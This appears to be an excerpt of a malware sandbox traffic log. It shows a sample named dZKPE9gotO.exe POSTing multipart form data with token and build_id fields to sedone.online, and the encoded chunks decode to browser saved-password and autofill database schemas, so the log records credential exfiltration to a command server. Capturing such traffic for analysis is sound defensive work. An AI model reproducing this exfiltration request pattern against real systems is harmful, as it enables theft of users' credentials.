                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:56 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                13192.168.2.749777116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:57 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 55081
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:57 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------QQIEKNGVAAAAIE3O8Q16Cont
                                                                                                                                                                                                                                                2024-12-16 14:39:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:57 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:57 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:58 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                14192.168.2.749783116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BS2D2V3W4EUAAIWBIWT2
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 142457
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------BS2D2V3W4EUAAIWBIWT2Cont
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
